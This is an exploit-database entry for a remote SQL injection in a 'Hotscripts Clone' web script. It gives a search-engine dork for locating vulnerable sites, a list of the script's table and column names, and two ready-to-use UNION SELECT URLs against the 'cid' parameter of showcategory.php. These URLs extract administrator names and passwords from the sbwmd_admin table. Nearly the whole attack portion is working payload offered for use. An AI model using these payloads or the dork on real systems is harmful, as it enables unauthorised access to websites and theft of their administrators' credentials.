[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hotscripts Clone (cid) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3737
Category
web applications
Date add
23-09-2008
Platform
unsorted
=========================================================
Hotscripts Clone (cid) Remote SQL Injection Vulnerability
=========================================================



|___________________________________________________|
|
| Hotscripts Clone (cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|___________________________________________________
|                                                   |
|
| script : http://www.greatclone.com/product_info.php?cPath=31&products_id=81
|
| DorK   : inurl:add_soft.php
|___________________________________________________|


sbwmd_config:username_len
sbwmd_email_id:useremail
sbwmd_mailing_list:username
sbwmd_mailing_list:useremail
sbwmd_members:username
sbwmd_admin:pwd>freemagics
sbwmd_config:pwd_len
sbwmd_members:pwd
sbwmd_admin:admin_name
sbwmd_config:admin_email
sbwmd_softwares:admin_desc





www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin--


OR


www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin--




#  0day.today [2024-11-15]  #